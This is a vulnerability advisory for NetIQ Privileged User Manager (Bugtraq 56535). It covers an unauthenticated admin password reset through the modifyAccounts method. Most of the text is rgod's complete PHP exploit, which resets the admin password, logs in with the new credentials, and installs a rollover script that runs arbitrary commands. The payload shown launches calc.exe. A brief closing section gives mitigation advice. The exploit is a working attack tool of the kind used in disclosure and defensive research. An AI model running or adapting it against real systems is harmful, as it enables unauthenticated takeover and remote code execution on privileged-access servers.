Release date:
Updated on:
Affected Systems:
NetIQ Privileged User Manager
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56535
NetIQ Privileged User Manager is a solution for secure access to UNIX, Linux, and Windows systems.
NetIQ Privileged User Manager is affected by an authentication bypass in its auth module: the modifyAccounts method can be invoked without a valid session, which lets a remote, unauthenticated attacker reset the administrator password. With the new credentials the attacker can log in and, as the test method below demonstrates, install a log-rollover script that executes arbitrary commands on the host.
Source: rgod (rgod@autistici.org)
Test method:
--------------------------------------------------------------------------------
Alert
The following procedure (test method) may be offensive and is intended only for security research and teaching. Use it at your own risk!
<?php
/*
Novell NetIQ Privileged User Manager 2.3.1 auth.dll pa_modify_accounts()
Remote Code Execution Exploit

Expected output:

C:\php>php 9sg_novell_netiq_i.php 192.168.0.1
[*] Attacking auth.dll...
[*] Modifying admin password...
[*] Done. Proceeding to next steps.
[*] svc_name->somename
[*] Logging in...
[*] Logged in: succeeded
[*] Identity Token->Token+TIzEtMLsksS92h4MlWUlySmFvQ2rx3W34xd1Fqbn5JanxGfn
65m57viBBllf1m0C680ZrLr0zaOSn7RrbfG/vt4TuXWd1p/5E/7lx3nj8ivnbbm133
T37cPgB9EJ8058WvT2rGdJK3fJ7SqmzBSR6J8yTYat7DaiRw+8T2md+WGbW0gGAwM4Ap95pA=
[*] Setting up a rolover script which launches calc.exe
[*] Done. The following perl script will be launched in 5 seconds:
system("calc.exe");
C:\php>

rgod
*/

// Notices are masked because the response parsing below indexes raw
// bytes; no wall-clock limit, since every request may wait for the curl
// timeout.
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);

// Fatal messages used by the start-up checks.
$err = array(
    "[!] This script is intended to be launched from the cli!",
    "[!] You need the curl extesion loaded!",
);

// This is a command-line tool; refuse to run under a web SAPI.
if (PHP_SAPI !== "cli") {
    die($err[0]);
}
/**
 * Print the command-line usage and terminate. Called when no target
 * address was given on the command line.
 */
function syntax()
{
    $usage = "usage: php 9sg_novell_netiq_i.php [ip_address]\r\n";
    print($usage);
    die();
}
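// A target address is mandatory; anything else is a usage error.
if (empty($argv[1])) {
    syntax();
}
print("[*] Attacking auth.dll...\n");

// Make sure the curl extension is available. Loading it at run time with
// dl() is a last resort: dl() is not present in every SAPI/build, so the
// original unconditional call could itself be fatal instead of printing the
// hint in $err[1].
if (!extension_loaded('curl')) {
    $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN');
    $lib = $win ? "php_curl.dll" : "php_curl.so";
    if (!function_exists('dl') || !dl($lib)) {
        die($err[1]);
    }
    print("[*] curl loaded\n");
}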
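/**
 * Send one HTTP(S) request to the PUM front end and return the raw
 * response (status line, headers and body), or false if curl reported an
 * error.
 *
 * @param string $url      Target URL, e.g. https://host:443/
 * @param bool   $is_post  true to POST $request as the body, false for GET
 * @param string $ck       Raw value for the Cookie header ("" for none)
 * @param string $request  Request body; the callers pass an AMF0 message
 * @return string|false
 */
function _s($url, $is_post, $ck, $request)
{
    global $_use_proxy, $proxy_host, $proxy_port;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    if ($is_post) {
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
    }
    curl_setopt($ch, CURLOPT_HEADER, 1);
    // The AMF content type is what the gateway dispatches on; the Flash
    // version header makes the request resemble the product's own client.
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        "Cookie: " . $ck,
        "Content-Type: application/x-amf", // do not touch this, important
        "X-flash-version: 11,4,402,278"
    ));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9; ENUSMSCOM)");
    // TLS peer/host verification is deliberately disabled (presumably
    // because the target presents a self-signed certificate). Be aware that
    // the new admin password and the identity token then travel over a
    // connection that any on-path attacker can intercept.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 15);
    if ($_use_proxy) {
        curl_setopt($ch, CURLOPT_PROXY, $proxy_host . ":" . $proxy_port);
    }

    $_d = curl_exec($ch);
    if (curl_errno($ch)) {
        // Report the transport failure instead of silently handing the
        // callers a false value that they would then try to parse as AMF.
        print("[!] curl error: " . curl_error($ch) . "\n");
        $_d = false;
    }
    // Always release the handle; the original leaked it on the error path.
    curl_close($ch);
    return $_d;
}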
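/*********************************** config ***********************************/
$host   = $argv[1];
$port   = 443;
// New administrator password set by stage 1 and used to log in afterwards.
$pwd    = "rgod_777_"; // by default minimum length = 8, minimum alpha = 1, minimum numeric = 1
// Body of the rollover script installed by stage 3 (Perl syntax, per the
// final status message).
$script = "system(\"calc.exe\");";
// Optional HTTP proxy. _s() reads these as globals, but the original never
// defined them (the resulting notices were hidden by error_reporting).
$_use_proxy = false;
$proxy_host = "127.0.0.1";
$proxy_port = 8080;
/******************************************************************************/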
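/**
 * Print (and return) a 16-bytes-per-row hex dump of $data: hex offset,
 * the bytes in hex, and an ASCII column in which non-printable bytes are
 * shown as '.'.
 *
 * @param string $data     Raw bytes to dump; an empty string yields "".
 * @param string $newline  Row terminator.
 * @return string The text that was printed.
 */
function hex_dump($data, $newline = "\n")
{
    static $from = '';
    static $to = '';
    static $width = 16;
    static $pad = '.';

    // Build the byte -> printable-character table once. The original
    // tested `$from = ''` (an assignment), so the table was never filled
    // and non-printable bytes were echoed raw.
    if ($from === '') {
        for ($i = 0; $i <= 0xFF; $i++) {
            $from .= chr($i);
            $to   .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
        }
    }

    // str_split('') does not yield zero rows on every PHP version.
    if ($data === '') {
        return '';
    }

    $hex_rows   = str_split(bin2hex($data), $width * 2);
    $ascii_rows = str_split(strtr($data, $from, $to), $width);
    $dump   = '';
    $offset = 0;
    foreach ($hex_rows as $i => $row) {
        $dump .= sprintf('%6x', $offset) . ': '
               . implode(' ', str_split($row, 2))
               . ' [' . $ascii_rows[$i] . ']' . $newline;
        $offset += $width;
    }
    // The original also slept for a second here, which only stalled the
    // caller; dropped.
    echo $dump;
    return $dump;
}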
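print("[*] Modifying admin password...\n");

// Stage 1: auth.modifyAccounts without a session.
// AMF0 envelope: version 0, no headers, one message targeting
// "SPF.Util.callMaster" (response URI "/262"); the body is one object:
//   { method: "modifyAccounts", module: "auth",
//     User: { name: "admin",
//             ACT_SUPER:   { value: 1 (number), action: "set" },
//             ACT_COMMENT: { value: "asdd",     action: "set" },
//             ACT_PASSWD:  { value: $pwd,       action: "set" },
//             ACT_DESC:    { value: "sds",      action: "set" } },
//     uid: undefined (0x06) }
// No credentials are presented: uid is the AMF "undefined" marker and the
// cookie below is a placeholder _SID_. That the server applies the change
// anyway is the authentication bypass this exploit relies on.
// The 32-bit body length (0x298) is hard-coded from the author's capture
// and is not recomputed for a different $pwd; it is reproduced unchanged.
// NOTE(review): the ACT_SUPER row below carries 17 bytes where an AMF0
// number (marker + 8-byte double) plus the next key length needs 16; it is
// reproduced as published -- confirm against a capture before "fixing".
$data = "\x00\x00\x00\x00\x00\x01\x00\x13\x53\x50\x46\x2e\x55\x74\x69\x6c" . //........SPF.Util
        "\x2e\x63\x61\x6c\x6c\x4d\x61\x73\x74\x65\x72\x00\x04\x2f\x32\x36" . //.callMaster../26
        "\x32\x00\x00\x02\x98\x0a\x00\x00\x00\x01\x03\x00\x06\x6d\x65\x74" . //2............met
        "\x68\x6f\x64\x02" .
        "\x00\x0e" .
        "modifyAccounts" . // boom
        "\x00\x06\x6d" .
        "\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00\x04\x55\x73" . //odule...auth..Us
        "\x65\x72\x03\x00\x04\x6e\x61\x6d\x65\x02" .                         //er...name.
        "\x00\x05" .
        "admin" .
        "\x00\x09\x41\x43\x54\x5f\x53\x55\x50\x45\x52\x03\x00\x05\x76\x61" . //..ACT_SUPER...va
        "\x6c\x75\x65\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x06\x61\x63" . //lue.?.........ac
        "\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x0b\x41" . //tion...set.....A
        "\x43\x54\x5f\x43\x4f\x4d\x4d\x45\x4e\x54\x03\x00\x05\x76\x61\x6c" . //CT_COMMENT...val
        "\x75\x65\x02\x00\x04\x61\x73\x64\x64\x00\x06\x61\x63\x74\x69\x6f" . //ue...asdd..actio
        "\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x0a\x41\x43\x54\x5f" . //n...set.....ACT_
        "\x50\x41\x53\x53\x57\x44\x03\x00\x05\x76\x61\x6c\x75\x65\x02" .     //PASSWD...value.
        pack("n", strlen($pwd)) . // 16 bit, big endian
        $pwd .
        "\x00\x06\x61\x63\x74\x69\x6f" .
        "\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x08\x41\x43\x54\x5f" . //n...set.....ACT_
        "\x44\x45\x53\x43\x03\x00\x05\x76\x61\x6c\x75\x65\x02\x00\x03\x73" . //DESC...value...s
        "\x64\x73\x00\x06\x61\x63\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74" . //ds..action...set
        "\x00\x00\x09\x00\x00\x09\x00\x03\x75\x69\x64\x06\x00\x00\x09";      //........uid....

$url = "https://$host:$port/";
$out = _s($url, 1, "_SID_=1;", $data);
// print(hex_dump($out)."\n");

// The later setLogConfig call needs the service name, which the response
// carries after the literal "svc": one byte (presumably the AMF string
// marker), a 16-bit big-endian length, then the name. The original indexed
// the response without checking that "svc" was present at all.
$pos = strpos((string)$out, "svc");
if ($out === false || $pos === false || strlen($out) < $pos + 6) {
    die("[!] No usable response to modifyAccounts (wrong target or version?)\n");
}
print("[*] Done. Proceeding to next steps.\n");
$tail = substr($out, $pos + 3);
$len  = unpack("n", substr($tail, 1, 2));
$svc_name = substr($tail, 3, $len[1]);
echo "[*] svc_name->" . $svc_name . "\n";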
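echo "[*] Logging in...\n";

// Stage 2: auth.login with the password just set.
// AMF0 envelope targeting "SPF.Util.callModuleEx" (response URI "/4"):
//   { pkt: { Credentials: { name: "admin", passwd: $pwd },
//            method: "login", module: "auth", uid: undefined } }
// The body length (0x65) is hard-coded from the author's capture and is not
// recomputed for a different $pwd; reproduced unchanged.
$data =
    "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74\x69" .     //.........SPF.Uti
    "\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00\x02" . //l.callModuleEx..
    "\x2f\x34\x00\x00\x00\x65\x0a\x00\x00\x00\x01\x03\x00\x03\x70\x6b" . ///4...e........pk
    "\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x03" . //t...Credentials.
    "\x00\x04\x6e\x61\x6d\x65\x02\x00\x05\x61\x64\x6d\x69\x6e\x00\x06" . //..name...admin..
    "\x70\x61\x73\x73\x77\x64\x02" .                                     //passwd.
    pack("n", strlen($pwd)) .
    $pwd .
    "\x00\x00\x09" .
    "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" . //..method...login
    "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" . //..module...auth.
    "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09";                      //.uid.......

$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
// print(hex_dump($out)."\n");

// strpos() returns an offset, so compare against false explicitly; the
// original `if (strpos(...))` would also treat a match at offset 0 as
// failure.
if ($out !== false && strpos($out, "successfully\x20authenticated") !== false) {
    echo "[*] Logged in: succeeded\n";
} else {
    die("[!] Exploit failed");
}

// The session token follows the literal "Identity" object key and its
// "content" string key: a 16-bit big-endian length, then the token. It is
// sent back as "uid" in the next request.
$marker = "Identity\x03\x00\x07content\x02";
$pos = strpos($out, $marker);
if ($pos === false || strlen($out) < $pos + strlen($marker) + 2) {
    die("[!] Login response carries no Identity token\n");
}
$tail = substr($out, $pos + strlen($marker));
$len  = unpack("n", substr($tail, 0, 2));
$identity = substr($tail, 2, $len[1]);
echo "[*] Identity Token->" . $identity . "\n";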
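echo "[*] Setting up a rolover script which launches calc.exe\n";

// Stage 3: regclnt.setLogConfig, authenticated with the identity token.
// The log configuration installs a "rollover" script that the product
// runs when the log rolls over (every 5 seconds here), which is what turns
// the password reset into code execution. Both the token and the service
// name from the earlier stages are required.
if (strlen((string)$identity) == 0 || strlen((string)$svc_name) == 0) {
    die("[!] Missing identity token or service name; cannot configure the rollover script\n");
}

// AMF0 envelope targeting "SPF.Util.callModuleA" (response URI "/165"):
//   { pkt: { method: "setLogConfig", module: "regclnt",
//            log: { file: "mylog.log", level: "trace", max_size: 10,
//                   min_log_lvl: 0, rolover: "S5",
//                   script: { content: $script . "\n\n1;" } },
//            uid: $identity },
//     svc_name: $svc_name }
// The body length (0x286) is hard-coded from the author's capture and is
// not recomputed for different $script/$identity/$svc_name lengths;
// reproduced unchanged.
// NOTE(review): as published, min_log_lvl is followed by ten zero bytes
// (an AMF0 number is a marker plus eight) and the next key is announced as
// 8 bytes long but spelled "rolover" (7). Both are reproduced verbatim
// because the original is reported to work; verify against a capture
// before changing either.
$data =
    "\x00\x00\x00\x00\x00\x01" .               // version 0, no headers, 1 message
    "\x00\x14" . "SPF.Util.callModuleA" .
    "\x00\x04" . "/165" .
    "\x00\x00\x02\x86\x0a\x00\x00\x00\x01\x03" . // body length, array(1), object
    "\x00\x03" . "pkt" . "\x03" .
    "\x00\x06" . "method" . "\x02" . "\x00\x0c" . "setLogConfig" .
    "\x00\x06" . "module" . "\x02" . "\x00\x07" . "regclnt" .
    "\x00\x03" . "log" . "\x03" .
    "\x00\x04" . "file" . "\x02" . "\x00\x09" . "mylog.log" .
    "\x00\x05" . "level" . "\x02" . "\x00\x05" . "trace" .
    "\x00\x08" . "max_size" . "\x00\x40\x24\x00\x00\x00\x00\x00\x00" .   // number 10.0
    "\x00\x0b" . "min_log_lvl" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x00\x08" . "rolover" . "\x02" . "\x00\x02" . "S5" . // repeat every 5 seconds, 1 hour = H1
    "\x00\x06" . "script" . "\x03" .
    "\x00\x07" . "content" . "\x02" .
    // +4 covers the two newlines and the trailing "1;" (a true value, as a
    // Perl file loaded with do/require apparently needs).
    pack("n", strlen($script) + 4) . $script . "\x0a\x0a" . "1;" .
    "\x00\x00\x09" .                           // end of script object
    "\x00\x00\x09" .                           // end of log object
    "\x00\x03" . "uid" . "\x02" . pack("n", strlen($identity)) . $identity .
    "\x00\x00\x09" .                           // end of pkt object
    "\x00\x08" . "svc_name" . "\x02" . pack("n", strlen($svc_name)) . $svc_name .
    "\x00\x00\x09";                            // end of top-level object

$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
// print(hex_dump($out)."\n");

// The original announced success even when the request never went out.
if ($out === false) {
    die("[!] setLogConfig request failed; the rollover script was not installed\n");
}
echo "[*] Done. The following perl script will be launched in 5 seconds:\n" . $script . "\n";
?>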
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Netiq
-----
At the time of writing the vendor has not released a patch or upgrade. Users of the software should monitor the vendor's site for a fixed version. Until one is available, restrict network access to the PUM management interface (TCP 443), since the first step of the exploit above requires no credentials.
https://www.netiq.com/products/